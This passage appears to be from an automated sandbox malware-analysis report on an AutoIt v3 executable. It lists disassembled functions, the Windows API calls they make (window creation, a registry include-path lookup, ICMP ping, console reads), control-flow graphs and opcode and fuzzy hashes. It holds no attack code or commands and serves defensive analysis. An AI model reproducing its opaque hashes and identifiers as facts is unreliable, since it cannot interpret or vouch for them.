                                                                                                                                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                        • API String ID: 98802146-2727554177
                                                                                                                                                                        • Opcode ID: 8c6ef64c0c0e93944012ced3f8fdd8f2609ae232720e1eb9633785d6427e3614
                                                                                                                                                                        • Instruction ID: 53dca3594448e76d33be5033c22c4ac9ad0f5f75d237f0e0a08952242ed3e4c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c6ef64c0c0e93944012ced3f8fdd8f2609ae232720e1eb9633785d6427e3614
                                                                                                                                                                        • Instruction Fuzzy Hash: 96718D755253019BC306EF65E8859AABBECFF89350F80842EF445871A0DF719AA8CF51
                                                                                                                                                                        Function 002634D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 002634DE
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 002634ED
                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00263503
                                                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00263515
                                                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00263527
                                                                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0026353F
                                                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00263590
                                                                                                                                                                          • Part of subcall function 00263624: GetSysColorBrush.USER32(0000000F), ref: 00263657
                                                                                                                                                                          • Part of subcall function 00263624: RegisterClassExW.USER32(00000030), ref: 00263681
                                                                                                                                                                          • Part of subcall function 00263624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00263692
                                                                                                                                                                          • Part of subcall function 00263624: InitCommonControlsEx.COMCTL32(?), ref: 002636AF
                                                                                                                                                                          • Part of subcall function 00263624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002636BF
                                                                                                                                                                          • Part of subcall function 00263624: LoadIconW.USER32(000000A9), ref: 002636D5
                                                                                                                                                                          • Part of subcall function 00263624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002636E4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                                                                        • Opcode ID: a4a7130f3298852975a0f3b3dd076aad40e1db4c49340fb9ec7838a4c76b58d0
                                                                                                                                                                        • Instruction ID: 575b484531f488d3406b257894b0aeceb05a9a207ddcc2799e826c30caec6a7e
                                                                                                                                                                        • Opcode Fuzzy Hash: a4a7130f3298852975a0f3b3dd076aad40e1db4c49340fb9ec7838a4c76b58d0
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D214179D10318AFDB129F95FC99BAABFB9FB08760F10402AE604A6270C3B90554CF94
                                                                                                                                                                        Function 002E0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 553 2e0fb8-2e0fef call 26e6a0 556 2e100f-2e1021 WSAStartup 553->556 557 2e0ff1-2e0ffe call 26c98d 553->557 558 2e1054-2e1091 call 27c1f6 call 268ec0 call 27f9d4 inet_addr gethostbyname 556->558 559 2e1023-2e1031 556->559 557->556 565 2e1000-2e100b call 26c98d 557->565 576 2e10a2-2e10b0 558->576 577 2e1093-2e10a0 IcmpCreateFile 558->577 561 2e1036-2e1046 559->561 562 2e1033 559->562 566 2e104b-2e104f 561->566 567 2e1048 561->567 562->561 565->556 570 2e1249-2e1251 566->570 567->566 579 2e10b5-2e10c5 576->579 580 2e10b2 576->580 577->576 578 2e10d3-2e1100 call 28017b call 26423c 577->578 589 2e112b-2e1148 IcmpSendEcho 578->589 590 2e1102-2e1129 IcmpSendEcho 578->590 581 2e10ca-2e10ce 579->581 582 2e10c7 579->582 580->579 584 2e1240-2e1244 call 26bd98 581->584 582->581 584->570 591 2e114c-2e114e 589->591 590->591 592 2e11ae-2e11bc 591->592 593 2e1150-2e1155 591->593 594 2e11be 592->594 595 2e11c1-2e11c8 592->595 596 2e115b-2e1160 593->596 597 2e11f8-2e120a call 26e6a0 593->597 594->595 601 2e11e4-2e11ed 595->601 598 2e11ca-2e11d8 596->598 599 2e1162-2e1167 596->599 611 2e120c-2e120e 597->611 612 2e1210 597->612 606 2e11dd 598->606 607 2e11da 598->607 599->592 604 2e1169-2e116e 599->604 602 2e11ef 601->602 603 2e11f2-2e11f6 601->603 602->603 608 2e1212-2e1229 IcmpCloseHandle WSACleanup 603->608 609 2e1193-2e11a1 604->609 610 2e1170-2e1175 604->610 606->601 607->606 608->584 616 2e122b-2e123d call 28013d call 280184 608->616 614 2e11a6-2e11ac 609->614 615 2e11a3 609->615 610->598 613 2e1177-2e1185 610->613 611->608 612->608 617 2e118a-2e1191 613->617 618 2e1187 613->618 614->601 615->614 616->584 617->601 618->617
                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 002E1019
                                                                                                                                                                        • inet_addr.WSOCK32(?), ref: 002E1079
                                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 002E1085
                                                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 002E1093
                                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002E1123
                                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002E1142
                                                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 002E1216
                                                                                                                                                                        • WSACleanup.WSOCK32 ref: 002E121C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                        • String ID: Ping
                                                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                                                        • Opcode ID: c15131cd955e32be9eff6b849ee7741e845ad10c6d4e8766e751ad11d86d521f
                                                                                                                                                                        • Instruction ID: 7b927e1ec90962237daf2e4b1e327d234ac525a42a656fec2be6cc5e1ad89749
                                                                                                                                                                        • Opcode Fuzzy Hash: c15131cd955e32be9eff6b849ee7741e845ad10c6d4e8766e751ad11d86d521f
                                                                                                                                                                        • Instruction Fuzzy Hash: BC91C3316142429FD720DF16C888B16BBE0BF44358F5485A9F5698F7A2C770EDA5CF81
                                                                                                                                                                        Function 0026F6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: Variable must be of type 'Object'.$t53$t53$t53$t53$t53t53
                                                                                                                                                                        • API String ID: 0-3522271721
                                                                                                                                                                        • Opcode ID: e5da52aa4a1607ed6a220b81314350e64f46e804286999ca4fdff25d2c49446c
                                                                                                                                                                        • Instruction ID: e744dd28d2512373cae67e7526dfd80d92b9024fa47f32657039244747cc736a
                                                                                                                                                                        • Opcode Fuzzy Hash: e5da52aa4a1607ed6a220b81314350e64f46e804286999ca4fdff25d2c49446c
                                                                                                                                                                        • Instruction Fuzzy Hash: D1C28B75A20215CFCF60DF98D9C0AADB7B1BF09310F248169E909AB391D775ADA1CF90
                                                                                                                                                                        Function 00270340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 002715F2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID: t53$t53$t53$t53$t53t53
                                                                                                                                                                        • API String ID: 1385522511-1124980192
                                                                                                                                                                        • Opcode ID: 5826dd584dbce082ba95e1343578003bef48bc9c3ef6ebfb366285998c87d622
                                                                                                                                                                        • Instruction ID: 8578850730bf8837286159e25093fcb51fc339a459994498dd7e9b0c078fbb93
                                                                                                                                                                        • Opcode Fuzzy Hash: 5826dd584dbce082ba95e1343578003bef48bc9c3ef6ebfb366285998c87d622
                                                                                                                                                                        • Instruction Fuzzy Hash: 2AB25774A28301CFDB24CF18C4D0A2AB7E1BF99310F14895DE9898B391D775ED69CB92
                                                                                                                                                                        Function 00262793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153comCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002632AF
                                                                                                                                                                          • Part of subcall function 0026327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 002632B7
                                                                                                                                                                          • Part of subcall function 0026327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002632C2
                                                                                                                                                                          • Part of subcall function 0026327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002632CD
                                                                                                                                                                          • Part of subcall function 0026327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 002632D5
                                                                                                                                                                          • Part of subcall function 0026327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 002632DD
                                                                                                                                                                          • Part of subcall function 00263205: RegisterWindowMessageW.USER32(00000004,?,00262964), ref: 0026325D
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00262A0A
                                                                                                                                                                        • OleInitialize.OLE32 ref: 00262A28
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 002A3A0D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                        • String ID: (&3$0$3$4'3$d(3$$3
                                                                                                                                                                        • API String ID: 1986988660-1084729728
                                                                                                                                                                        • Opcode ID: 31029c3c31c14ed741a4397d4b88bc51e68f724a05cd8fb97a87fa4293e9fecf
                                                                                                                                                                        • Instruction ID: cbc51a1beb8408ab465468c900df33f50a84d645101801d49176e648a473b59a
                                                                                                                                                                        • Opcode Fuzzy Hash: 31029c3c31c14ed741a4397d4b88bc51e68f724a05cd8fb97a87fa4293e9fecf
                                                                                                                                                                        • Instruction Fuzzy Hash: 7671CFB49212008FE38BDF7ABDE5617BAE9BB4A341F40812AE508C7271EB704695CF54
                                                                                                                                                                        Function 002990C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1633 2990c5-2990d5 1634 2990ef-2990f1 1633->1634 1635 2990d7-2990ea call 28f636 call 28f649 1633->1635 1637 299459-299466 call 28f636 call 28f649 1634->1637 1638 2990f7-2990fd 1634->1638 1649 299471 1635->1649 1656 29946c call 292b5c 1637->1656 1638->1637 1641 299103-29912e 1638->1641 1641->1637 1644 299134-29913d 1641->1644 1647 29913f-299152 call 28f636 call 28f649 1644->1647 1648 299157-299159 1644->1648 1647->1656 1652 29915f-299163 1648->1652 1653 299455-299457 1648->1653 1655 299474-299479 1649->1655 1652->1653 1654 299169-29916d 1652->1654 1653->1655 1654->1647 1658 29916f-299186 1654->1658 1656->1649 1661 299188-29918b 1658->1661 1662 2991a3-2991ac 1658->1662 1664 29918d-299193 1661->1664 1665 299195-29919e 1661->1665 1666 2991ca-2991d4 1662->1666 1667 2991ae-2991c5 call 28f636 call 28f649 call 292b5c 1662->1667 1664->1665 1664->1667 1668 29923f-299259 1665->1668 1670 2991db-2991dc call 293b93 1666->1670 1671 2991d6-2991d8 1666->1671 1698 29938c 1667->1698 1674 29932d-299336 call 29fc1b 1668->1674 1675 29925f-29926f 1668->1675 1677 2991e1-2991f9 call 292d38 * 2 1670->1677 1671->1670 1687 2993a9 1674->1687 1688 299338-29934a 1674->1688 1675->1674 1676 299275-299277 1675->1676 1676->1674 1680 29927d-2992a3 1676->1680 1702 2991fb-299211 call 28f649 call 28f636 1677->1702 1703 299216-29923c call 2997a4 1677->1703 1680->1674 1684 2992a9-2992bc 1680->1684 1684->1674 1689 2992be-2992c0 1684->1689 1691 2993ad-2993c5 ReadFile 1687->1691 1688->1687 1693 29934c-29935b GetConsoleMode 1688->1693 1689->1674 1694 2992c2-2992ed 1689->1694 1696 299421-29942c GetLastError 1691->1696 1697 2993c7-2993cd 1691->1697 1693->1687 1699 29935d-299361 1693->1699 1694->1674 1701 2992ef-299302 1694->1701 1704 29942e-299440 call 28f649 call 28f636 1696->1704 1705 299445-299448 1696->1705 1697->1696 1706 2993cf 1697->1706 1700 29938f-299399 call 292d38 1698->1700 1699->1691 1707 299363-29937d ReadConsoleW 1699->1707 1700->1655 1701->1674 1711 299304-299306 1701->1711 1702->1698 1703->1668 1704->1698 1708 29944e-299450 1705->1708 1709 299385-29938b call 28f613 1705->1709 1715 2993d2-2993e4 1706->1715 1716 29937f GetLastError 1707->1716 1717 29939e-2993a7 1707->1717 1708->1700 1709->1698 1711->1674 1720 299308-299328 1711->1720 1715->1700 1724 2993e6-2993ea 1715->1724 1716->1709 1717->1715 1720->1674 1728 2993ec-2993fc call 298de1 1724->1728 1729 299403-29940e 1724->1729 1738 2993ff-299401 1728->1738 1730 29941a-29941f call 298c21 1729->1730 1731 299410 call 298f31 1729->1731 1739 299415-299418 1730->1739 1731->1739 1738->1700 1739->1738
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d5bae1650293eaefa747d1c41dc396327c3113119c9d3480bc6d62a8b6c63e1a
                                                                                                                                                                        • Instruction ID: a92e0bb1dbf89c6cf43cb8b4c446b57f7d27c3cbe898c61e6daca9ee37d449ed
                                                                                                                                                                        • Opcode Fuzzy Hash: d5bae1650293eaefa747d1c41dc396327c3113119c9d3480bc6d62a8b6c63e1a
                                                                                                                                                                        • Instruction Fuzzy Hash: 08C1F57492424AAFDF12DFACD841BADBBB4AF09320F08419DE514A73D2C77099A1CF61
                                                                                                                                                                        Function 002635B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1777 2635b3-263623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002635E1
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00263602
                                                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00263368,?), ref: 00263616
                                                                                                                                                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00263368,?), ref: 0026361F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                                                        • Opcode ID: d69fcc8646864ba991dd41c73036328ab6c7f7afd0ed27cd895e7d0b4cc4227d
                                                                                                                                                                        • Instruction ID: 3e2032ef4740300d5e4a16592640abd2927d6aeb49573807aaf090eb70f8e19e
                                                                                                                                                                        • Opcode Fuzzy Hash: d69fcc8646864ba991dd41c73036328ab6c7f7afd0ed27cd895e7d0b4cc4227d
                                                                                                                                                                        • Instruction Fuzzy Hash: 89F03A786002987AE73217137C8CF376EBED7C7F71F10002EBA04AB260C2691855EAB0
                                                                                                                                                                        Function 0029316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1872 29316b-293182 GetLastError 1873 293190-293197 call 294ff0 1872->1873 1874 293184-29318e call 293581 1872->1874 1878 29319c-2931a2 1873->1878 1874->1873 1879 2931e1-2931e8 SetLastError 1874->1879 1880 2931ad-2931bb call 2935d7 1878->1880 1881 2931a4 1878->1881 1882 2931ea-2931ef 1879->1882 1887 2931bd-2931be 1880->1887 1888 2931c0-2931d6 call 292f56 call 292d38 1880->1888 1883 2931a5-2931ab call 292d38 1881->1883 1891 2931d8-2931df SetLastError 1883->1891 1887->1883 1888->1879 1888->1891 1891->1882
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(0000000A,?,?,0028F64E,0028545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00293170
                                                                                                                                                                        • _free.LIBCMT ref: 002931A5
                                                                                                                                                                        • _free.LIBCMT ref: 002931CC
                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002931D9
                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 002931E2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                        • Opcode ID: 90d068c52925803c3b6f7ac6196d149424a3b5ec98f660478cdf7387ed82d972
                                                                                                                                                                        • Instruction ID: 7315610687025ddccf37399899b2635a9ffd2e5efa310086a379ef830e553526
                                                                                                                                                                        • Opcode Fuzzy Hash: 90d068c52925803c3b6f7ac6196d149424a3b5ec98f660478cdf7387ed82d972
                                                                                                                                                                        • Instruction Fuzzy Hash: D40149722746017B8F22AA34AC89D3B265D9FC53B17200038F929D21B1EE61CB324960
                                                                                                                                                                        Function 002661A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002A5287
                                                                                                                                                                          • Part of subcall function 00268577: _wcslen.LIBCMT ref: 0026858A
                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00266299
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                        • String ID: Line %d: $AutoIt -
                                                                                                                                                                        • API String ID: 2289894680-4094128768
                                                                                                                                                                        • Opcode ID: 14632916b9ed2ec4a2ecfc93be4b95a5766ce205dbc93819dee42b913db3b424
                                                                                                                                                                        • Instruction ID: 0ad7c69a63cfd588fd96efa14d6e770b3e4f02e6a6bf6f197561274ed30e891a
                                                                                                                                                                        • Opcode Fuzzy Hash: 14632916b9ed2ec4a2ecfc93be4b95a5766ce205dbc93819dee42b913db3b424
                                                                                                                                                                        • Instruction Fuzzy Hash: BF41D571428315ABC311EB60EC95FDF77DCAF45324F00462EF999920A1EF7096A9CB92
                                                                                                                                                                        Function 00298A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,OV*,0029894C,?,00329CE8,0000000C,002989AB,?,OV*,?,002A564F), ref: 00298A84
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00298A8E
                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00298AB9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
